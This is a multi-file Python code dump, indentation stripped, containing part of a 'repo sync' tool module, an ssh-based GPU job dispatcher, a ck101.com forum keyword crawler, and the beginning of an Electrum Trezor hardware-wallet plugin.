print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr)
sys.exit(1)
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop fetching repos that will always be missing: if the set of
# missing repos has not changed since the last fetch, break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt, err_event))
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
err_network_sync = True
if opt.fail_fast:
print('\nerror: Exited sync due to fetch errors.\n'
'Local checkouts *not* updated. Resolve network issues & '
'retry.\n'
'`repo sync -l` will update some local checkouts.',
file=sys.stderr)
sys.exit(1)
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
err_event.set()
err_update_projects = True
if opt.fail_fast:
print('\nerror: Local checkouts *not* updated.', file=sys.stderr)
sys.exit(1)
err_results = []
# NB: We don't exit here because this is the last step.
err_checkout = not self._Checkout(all_projects, opt, err_results)
if err_checkout:
err_event.set()
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.is_set():
print('\nerror: Unable to fully sync the tree.', file=sys.stderr)
if err_network_sync:
print('error: Downloading network changes failed.', file=sys.stderr)
if err_update_projects:
print('error: Updating local project lists failed.', file=sys.stderr)
if err_checkout:
print('error: Checking out local projects failed.', file=sys.stderr)
if err_results:
print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr)
print('Try re-running with "-j1 --fail-fast" to exit at the first error.',
file=sys.stderr)
sys.exit(1)
if not opt.quiet:
print('repo sync has finished successfully.')
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, repo_verify=True, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if not repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo.',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir
env['GNUPGHOME'] = gpg_dir
cmd = [GIT, 'tag', '-v', cur]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
env=env, check=False)
if result.returncode:
print(file=sys.stderr)
print(result.stdout, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a * t) + ((1 - a) * old)
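# Worked example of the exponential moving average above (illustrative numbers):
# with _ALPHA = 0.5, a stored time of 80s and a new measurement of 40s give
#   0.5 * 40 + (1 - 0.5) * 80 = 60
# so a single unusually slow or fast fetch only moves the estimate halfway toward it.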
def _Load(self):
if self._times is None:
try:
with open(self._path) as f:
self._times = json.load(f)
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
with open(self._path, 'w') as f:
json.dump(self._times, f, indent=2)
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport using urllib.request
# and supporting persistent-http[s]. It cannot change hosts from
# request to request like the normal transport; the real URL is
# passed during initialization.
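# Rough sketch of how this transport is used by _SmartSyncSetup (hypothetical URL):
#   transport = PersistentTransport('persistent-https://example.com/manifest-server')
#   server = xmlrpc.client.Server('https://example.com/manifest-server', transport=transport)
# The 'persistent-' prefix is stripped from the URL handed to xmlrpc.client, while
# request() below resolves the real scheme and any proxy from the original host.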
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile(mode='w')
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy})
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
|
dispatcher.py
|
from __future__ import unicode_literals
import subprocess
import time
import sys
import datetime
try:
import queue as queue
except ImportError:
import Queue as queue
from functools import partial
from random import shuffle, seed
import multiprocessing as mp
import threading
import os
import re
MAX_PARALLEL_JOBS = 4
"""
How many times a failed job is retried before it is skipped
"""
MAX_RETRIES = 2
"""
Temperature (degrees C) below which a gpu is considered unused
"""
MAX_TEMPERATURE = 70
"""
How long (in seconds) a host is reserved by a job on startup, before other jobs are allowed to take the same host
"""
RESERVE_TIME_FOR_JOB_STARTUP = 60
"""
How long (in seconds) we wait for the suitability check on a host before dropping that host from the list
"""
HOST_SUITABILITY_TIMEOUT = 10
LOG_TARGETS = dict(
none=None,
stdout=sys.stdout,
stderr=sys.stderr,
file=2,
file_autorm=3, # automatically remove the logfile, if the job failed
)
UNIT_TO_GB = {
b'kB': 1e-6,
b'MB': 1e-3,
b'GB': 1
}
def _print_info(info):
print('[I]: '+info)
def _print_warning(err):
print('\033[93m[W]: ' + err + '\033[0m')
def _print_error(err):
print('\033[91m\033[1m[E]: ' + err + '\033[0m')
def _print_ok(info):
print('\033[92m[I]: ' + info + '\033[0m')
def time_stamped(fmt='%Y-%m-%d-%H-%M-%S.%f'):
return datetime.datetime.now().strftime(fmt)[:-3]
class TimeoutError(Exception):
pass
class RemoteError(Exception):
pass
class TimeoutCommand(object):
def __init__(self, cmd, logfile=None):
self.cmd = cmd
self.logfile = logfile
self.process = None
self.output = []
self.retcode = -1
def call(self, timeout=None):
def run():
self.process = subprocess.Popen(self.cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
p = self.process
with p.stdout:
# p.stdout yields bytes, so the readline sentinel must be b'' (not '')
for line in iter(p.stdout.readline, b''):
if self.logfile is not None:
try:
if sys.version_info[0] >= 3:
self.logfile.write(str(line, 'utf-8'))
else:
self.logfile.write(line)
self.logfile.flush()
except IOError as e:
print(e)
self.output = line
else:
self.output.append(line.strip())
p.wait()
self.retcode = p.returncode
thread = threading.Thread(target=run)
thread.start()
thread.join(timeout)
if thread.is_alive():
# timeout happened
try:
self.process.terminate()
thread.join()
except AttributeError:
pass
raise TimeoutError()
return self.retcode, self.output
def remote_exec(host, command, timeout=None, logfile=None):
"""Calls a command on a remote host via ssh
Parameters
----------
host : str
Hostname or address
command : str
Command to execute on host
timeout : int
Optional timeout for maximal running time in seconds. Set to None if not desired
logfile : filehandle
If set, all outputs from remotely executed command will be written to this file handle
Returns
----------
int
Return code of executed command on remote host
list
List of command output strings
"""
rc, output = TimeoutCommand(['ssh', host, command], logfile).call(timeout)
return rc, output
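# Minimal usage sketch (hypothetical host name):
#   rc, lines = remote_exec('gpuhost01', 'nvidia-smi -L', timeout=10)
#   if rc == 0:
#       for line in lines:
#           print(line)
# With no logfile the output lines are collected in a list; with a logfile they
# are streamed to that file handle instead.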
def query_gpu_users(host):
"""Queries current users of gpus on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
list
List of user names
"""
cmd = 'nvidia-smi --query-compute-apps=pid --format=csv,noheader | xargs ps -o user'
retcode, output = remote_exec(host, cmd)
if retcode != 0:
raise RemoteError('Could not query gpu info via nvidia-smi on %s'%host)
return output[1:]
def query_gpu_utilization(host):
"""Queries gpu utilization on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
list
List of tuples (memory used in GB, total memory in GB, temperature in degrees C).
The length of the list equals the number of gpus on the host
"""
cmd = 'nvidia-smi --query-gpu="memory.used,memory.total,temperature.gpu" --format=csv,noheader,nounits'
retcode, output = remote_exec(host, cmd, timeout=HOST_SUITABILITY_TIMEOUT)
if retcode != 0:
raise RemoteError('Could not query gpu info via nvidia-smi on %s'%host)
# remove entries that do not adhere to the format \d+, \d+, \d+
# (the output lines are bytes, so a bytes pattern is required)
pattern = re.compile(rb'\d+, \d+, \d+')
i = 0
while i < len(output):
if pattern.match(output[i]) is None:
output.pop(i)
else:
i += 1
num_gpus = len(output)
mem_util = []
for gpu in output:
mem_used, mem_total, temp = gpu.split(b', ')
mem_used = int(mem_used)*UNIT_TO_GB[b'MB']
mem_total = int(mem_total)*UNIT_TO_GB[b'MB']
mem_util.append((mem_used, mem_total, int(temp)))
return mem_util
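# Example of the structure returned above (illustrative numbers for a 2-GPU host):
#   [(0.4, 11.2, 41), (10.8, 11.2, 78)]
# i.e. GPU 0 has ~0.4 GB in use out of 11.2 GB at 41 degrees C, GPU 1 is busy and hot.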
def query_cpu_utilization(host):
"""Queries cpu utilization and available memory on remote host
Parameters
----------
host : str
Hostname or address
Returns
----------
float
cpu utilization (fraction),
float
available memory in GB
float
total memory in GB
"""
cmd = "echo \"$(mpstat | grep all) $(cat /proc/meminfo | grep -E 'MemTotal|MemAvailable')\""
retcode, output = remote_exec(host, cmd, timeout=HOST_SUITABILITY_TIMEOUT)
if retcode != 0:
raise RemoteError('Could not query cpu and memory utilization on %s'%host)
cpu_util = []
entries = output[0].split()
cpu = float(entries[3])
totalmem = int(entries[14])
unit = entries[15]
totalmem = totalmem*UNIT_TO_GB[unit]
entries = output[1].split()
mem = int(entries[1])
unit = entries[2]
mem = mem*UNIT_TO_GB[unit]
return cpu/100., mem, totalmem
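# Example return value (illustrative): (0.12, 48.3, 64.0) means ~12% CPU load and
# ~48.3 GB of memory available out of 64 GB total.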
def host_satisfies_conditions(host,
required_gpus, required_gpu_mem,
required_cpu_mem):
"""Queries the host whether the given hardware requirements are satisfied and satisfiable
"""
satisfies = False
satisfiable = False
queued_gpus = []
if required_gpus > 0:
try:
gpu_util = query_gpu_utilization(host)
if len(gpu_util) >= required_gpus:
# check for satisfiability
req_mem_satisfiable = 0
for mem_used, mem_total, temp in gpu_util:
if mem_total > required_gpu_mem:
req_mem_satisfiable += 1
if req_mem_satisfiable >= required_gpus:
satisfiable = True
for gpui, gpu in enumerate(gpu_util):
if gpu[2] > MAX_TEMPERATURE:
continue
if (gpu[1]-gpu[0]) >= required_gpu_mem:
queued_gpus.append(str(gpui))
if len(queued_gpus) == required_gpus:
satisfies = True
break
except RuntimeError:
satisfiable = False
if required_cpu_mem > 0:
try:
cpu_util, cpu_mem, cpu_total_mem = query_cpu_utilization(host)
satisfies = required_cpu_mem < cpu_mem
satisfiable = cpu_total_mem >= required_cpu_mem
except RuntimeError:
satisfiable = False
return satisfies, satisfiable, queued_gpus
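# Usage sketch (hypothetical host): asking for 2 GPUs with 8 GB free each and no
# CPU-memory requirement,
#   ok, possible, gpus = host_satisfies_conditions('gpuhost01', 2, 8, 0)
# might return satisfies=True, satisfiable=True, queued_gpus=['0', '3'], where the
# queued gpu indices are later exported via CUDA_VISIBLE_DEVICES.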
def find_free_host(hostlist,
required_gpus, required_gpu_mem,
required_cpu_mem,
):
"""Returns the first host, that matches the required number of gpus and memory
Parameters
----------
hostlist : list
List of hostnames or addresses
required_gpus : int
Number of required gpus
required_gpu_mem : int
Amount of free memory required per gpu in GB
required_cpu_mem : int
Amount of free cpu memory required in GB
Returns
----------
str
Hostname that matches the conditions
list
GPU utilizations of the host
"""
any_satisfies = False
for host in hostlist:
satisfies, satisfiable, gpu_list = host_satisfies_conditions(host, required_gpus, required_gpu_mem, required_cpu_mem)
if satisfies:
return host, gpu_list
if satisfiable:
any_satisfies = True
if not any_satisfies:
raise RuntimeError('Conditions based on %d required gpus with %d GB each are not satisfiable by any machine at any time.' % (required_gpus, required_gpu_mem))
return None, []
def __interrupt_safe_put(q, obj, timeout=0.1):
while True:
try:
q.put(obj, timeout=timeout)
except queue.Full:
continue
return
def __interrupt_safe_get(q, timeout=0.1, verbose=False):
t0 = time.time()
t1 = t0
dt = 5.
while True:
try:
obj = q.get(timeout=timeout)
except queue.Empty:
if verbose and (time.time()-t1) > dt:
_print_info('Waiting for free host. Elapsed time %.1fs ...'%(time.time()-t0))
t1 = time.time()
dt = 60.
continue
except Exception as e:
print('#################################')
print(e)
return obj
def _async_dispatch(task, queue_pending, queue_ready, log_target):
"""Dispatch helper loop. Do not call individually.
Loops randomly over all hosts and dispatches the given command if a host satisfies the given requirements on memory and number of gpus.
Parameters
----------
task : tuple
Tuple of length 2 (int, str): the command id and the command string.
queue_pending : multiprocessing.Queue
Enqueues list of hostnames that have not been evaluated for utilization yet
queue_ready : multiprocessing.Queue
Enqueues list of hosts that satisfy gpu requirements and are ready to use
log_target : str
One of the keys in LOG_TARGETS
Returns
----------
str
Hostname, the command was dispatched to
tuple
IDs of the gpus used on the host
str
A copy of the command executed on the host, including the set CUDA_VISIBLE_DEVICES environment variable.
"""
seed(datetime.datetime.now().timestamp())  # newer Pythons require an int/float/str/bytes seed
idx, command = task
dispatched = False
available_host = None
tries_left = MAX_RETRIES
while not dispatched:
access_info = None
while access_info is None:
access_info = __interrupt_safe_get(queue_ready, verbose=True)
if isinstance(access_info, str) and access_info == 'SHUTDOWN':
# SHUTDOWN means the requirements can never be satisfied; stop this dispatcher
return None, None, None
# if the information is greater than 5 seconds old, put back in pending queue
if (time.time() - access_info['t']) > 5.0:
__interrupt_safe_put(queue_pending, (access_info['hostname'], 0))
access_info = None
available_host, gpuids = access_info['hostname'], access_info['gpuids']
if available_host is not None:
dispatched = True
host_command = 'export CUDA_VISIBLE_DEVICES=%s; %s'%(','.join(gpuids), command)
key = time_stamped()
if log_target.startswith('file'):
logfilepath = './%s-[%d]-%s.out' % (key, idx, available_host)
print('Log file at: %s'%logfilepath)
logfile = open(logfilepath, 'w')
logfile.write(host_command+'\n\n')
else:
logfile = LOG_TARGETS[log_target]
_print_info('Dispatching command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
t_start = time.time()
try:
# reserve this host for RESERVE_TIME_FOR_JOB_STARTUP seconds so the job has time to claim its memory
__interrupt_safe_put(queue_pending, (available_host, t_start + RESERVE_TIME_FOR_JOB_STARTUP))
retcode, lastoutput = remote_exec(available_host, host_command, logfile=logfile)
except KeyboardInterrupt as e:
_print_error('Interrupted command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
return None, None, None
finally:
t_end = time.time()
if logfile is not None and logfile is not sys.stdout and logfile is not sys.stderr:
logfile.close()
if retcode != 0:
if log_target == 'file_autorm' and (t_end - t_start) < 10.:
os.remove(logfilepath)
if log_target.startswith('file'):
if os.path.isfile(logfilepath):
os.rename(logfilepath, logfilepath[:-4]+'_failed.out')
if tries_left > 0:
_print_warning('Error while executing command [%d] on host %s on gpus %s. Trying again ...' % (idx, available_host, ','.join(gpuids)))
_print_warning('Last output line:\n%s' % lastoutput)
dispatched = False
tries_left -= 1
else:
_print_error('Error while executing command [%d] on host %s on gpus %s. Skipping job:' % (idx, available_host, ','.join(gpuids)))
_print_error('-------------------------------------')
_print_error(command)
_print_error('-------------------------------------')
else:
_print_ok('Finished command [%d] on host %s on gpus: %s' % (idx, available_host, ','.join(gpuids)))
_print_ok('Last output line:\n%s' % lastoutput)
if not dispatched:
print('Command [%d] pending...' % idx)
# time.sleep(1) # sleep 1 second
return available_host, gpuids, host_command
def _utilization_enqueuer(numhosts, queue_ready, queue_pending, required_gpus, required_gpu_mem, required_cpu_mem):
# conditions_satisfiable = False
# if not conditions_satisfiable:
# raise RuntimeError('Conditions based on %d required gpus with %dMB each is not satisfiable by any machine at any time.' % (required_gpus, required_gpu_mem))
while True:
host, twait = __interrupt_safe_get(queue_pending)
if host == '':
# We're done
break
if time.time() < twait:
# do not evaluate this host yet
__interrupt_safe_put(queue_pending, (host, twait))
continue
timestamp = time.time()
try:
# print('[%s] Querying ...'%host)
satisfies, satisfiable, queued_gpus = host_satisfies_conditions(host, required_gpus, required_gpu_mem, required_cpu_mem)
except TimeoutError:
# print('[%s] Timeout'%host)
satisfiable = None
satisfies = False
except RemoteError:
# print('[%s] Remote execution error'%host)
satisfiable = None
satisfies = False
if satisfiable is None or satisfiable == True:
if satisfies:
try:
queue_ready.put({'t': timestamp, 'hostname': host, 'gpuids': queued_gpus}, timeout=0.1)
except queue.Full as e:
# put back in pending queue, if queue_ready is full (that should not happen)
print('Unexpected Exception caught: queue.Full')
queue_pending.put((host, 0), timeout=0.1)
else:
# put back and check later in 5 seconds
__interrupt_safe_put(queue_pending, (host, time.time() + 5))
else:
# otherwise, leave the host out of our list entirely. It will never satisfy our requirements
# print('never satisfies: %s'%host)
numhosts -= 1
if numhosts == 0:
# Notify all dispatcher processes to shutdown
for k in range(MAX_PARALLEL_JOBS):
__interrupt_safe_put(queue_ready, 'SHUTDOWN')
raise RuntimeError('Conditions are not satisfiable by any machine at any time.')
pass
def dispatch(hostlist, commands, required_gpus=1, required_gpu_mem=8, required_cpu_mem=0, log_target='file'):
"""Main dispatcher method.
Arguments
----------
hostlist : list
List of hostnames or addresses
commands : list
List of command strings, as would be written in shell. Ensure the correct working directory by prepending a `cd ~/workdir/...;` if necessary.
required_gpus : int
Integer or list of integers defining the minimum number of required gpus on a single host. If list, len(required_gpus) must be equal to len(commands)
required_gpu_mem : int
In GB. Integer or list of integers, defining the minimum amount of free memory required per gpu on a single host.
required_cpu_mem : int
In GB. Integer or list of integers, defining the minimum amount of available cpu memory on a single host.
log_target : str
One of the keys in LOG_TARGETS
"""
if type(required_gpus) is list and len(required_gpus) != len(commands):
raise RuntimeError('Entries in required_gpus list must be equal to entries in commands.')
if type(required_gpu_mem) is list and len(required_gpu_mem) != len(commands):
raise RuntimeError('Entries in required_gpu_mem list must be equal to entries in commands.')
if type(required_cpu_mem) is list and len(required_cpu_mem) != len(commands):
raise RuntimeError('Entries in required_cpu_mem list must be equal to entries in commands.')
# if type(required_gpus) is int:
# required_gpus = [required_gpus]*len(commands)
# if type(required_gpu_mem) is int:
# required_gpu_mem = [required_gpu_mem]*len(commands)
pool = mp.Pool(processes=MAX_PARALLEL_JOBS)
m = mp.Manager()
# fill queue
queue_pending = m.Queue(len(hostlist)+1)
queue_ready = m.Queue(len(hostlist)+1)
shuffle(hostlist)
for host in hostlist:
queue_pending.put((host, 0))
numhosts = len(hostlist)
# start enqueuer
enqueuer = mp.Process(target=_utilization_enqueuer, args=(numhosts, queue_ready, queue_pending, required_gpus, required_gpu_mem, required_cpu_mem))
enqueuer.start()
cmdinds = range(len(commands))
pool.map_async(
partial(_async_dispatch, queue_pending=queue_pending, queue_ready=queue_ready, log_target=log_target),
zip(cmdinds, commands)
).get(9999999)
print('Please wait for processes to finish...')
pool.close()
queue_pending.put(('', 0))
pool.join()
enqueuer.join()
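# Minimal usage sketch of the dispatcher (hypothetical hosts and commands; the
# hosts must be reachable via passwordless ssh for this to work):
#
#   hosts = ['gpuhost01', 'gpuhost02', 'gpuhost03']
#   commands = ['cd ~/experiments; python train.py --run %d' % i for i in range(8)]
#   dispatch(hosts, commands, required_gpus=1, required_gpu_mem=8,
#            required_cpu_mem=0, log_target='file')
#
# Each command is prefixed with CUDA_VISIBLE_DEVICES for the GPUs it was granted
# and executed remotely; at most MAX_PARALLEL_JOBS commands run at the same time.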
|
CKCrawler.py
|
from bs4 import BeautifulSoup as bs
from urllib.request import urlopen
from urllib.request import Request
import threading
import webbrowser
from collections import OrderedDict
class CKCrawler(object):
def __init__(self, tid, keyword, p1, p2):
homeData = self.getpageData(tid, 1)
lastPage = int(homeData.find('a', class_="last").string[3:])
p2 = lastPage if p2 == 99999 else p2
self.err = None
if p1 > lastPage or p2 > lastPage:
self.err = '好像沒這麼多頁喔'
return
self.donelist = []
self.findlist = {}
self.total = p2 - p1 + 1
self.tid = tid
self.th1, self.th2, self.th3 = self.createThread(p1, p2, tid, keyword)
def getpageData(self, tid, page):
url = 'https://ck101.com/thread-{}-{}-1.html'.format(tid, page)
req = Request(url, headers={'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11'})
data = bs(urlopen(req).read(), 'lxml')
return data
def createThread(self, p1, p2, tid, keyword):
total = p2 - p1 + 1
def search(start, end):
for i in range(start, end):
data = self.getpageData(tid, i)
articles = data.find_all('td', class_="t_f")
for article in articles:
pid = article.attrs['id'].split('_')[-1]
content = article.text.replace('\r\n', '')
idx = content.find(keyword)
if idx == -1:
continue
num = 100
grabs = max(idx - num, 0)
grage = idx + len(keyword) + num
self.findlist[pid] = content[grabs:grage]
self.donelist.append(i)
if total <= 3:
th1 = threading.Thread(target=search, args=(p1, p2 + 1))
th2 = threading.Thread(target=search, args=(p1, p1))
th3 = threading.Thread(target=search, args=(p1, p1))
else:
gap = self.total // 3
s1, s2, s3, s4 = p1, p1 + gap, p1 + 2 * gap, p2 + 1
th1 = threading.Thread(target=search, args=(s1, s2))
th2 = threading.Thread(target=search, args=(s2, s3))
th3 = threading.Thread(target=search, args=(s3, s4))
return th1, th2, th3
def startThread(self):
self.th1.start()
self.th2.start()
self.th3.start()
def openHtml(self):
message = """
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style>
body {background-color: #bcbcbc; font-family: "Microsoft JhengHei", "Times New Roman";}
a {background-color: #ceecec; display:block; width: 50%;
padding: 20px; border-radius: 15px; -moz-border-radius: 15px;
text-decoration:none;color:black; white-space: pre-line; margin: auto;}
a:visited {background-color: #ececec;}
</style>
</head>
<body>
"""
sortedDict = OrderedDict(sorted(self.findlist.items()))
for key, val in sortedDict.items():
message += self.herfModule(key, val)
message += """
</body>
</html>
"""
with open('result.html', 'w', encoding='utf-8') as f:  # match the charset declared in the HTML header
f.write(message)
webbrowser.open_new_tab('result.html')
def herfModule(self, pid, world):
url = 'https://ck101.com/forum.php?mod=redirect&goto=findpost&ptid={}&pid={}'.format(self.tid, pid)
return """<a href="{}" target="_blank">{}</a>
<br>""".format(url, world)
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorInitSettings(NamedTuple):
word_count: int
label: str
pin_enabled: bool
passphrase_enabled: bool
recovery_type: Any = None
no_backup: bool = False
class TrezorPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://wallet.trezor.io'
# libraries_URL = 'https://github.com/trezor/python-trezor' # kani
libraries_URL = 'https://github.com/omotenashicoin-project/python-trezor.git'
minimum_firmware = (1, 6, 0)
keystore_class = TrezorKeyStore
minimum_library = (0, 11, 0)
maximum_library = (0, 12)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
DEVICE_IDS = (TREZOR_PRODUCT_KEY,)
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
super().__init__(parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import trezorlib
try:
version = trezorlib.__version__
except Exception:
version = 'unknown'
if TREZORLIB:
return version
else:
raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
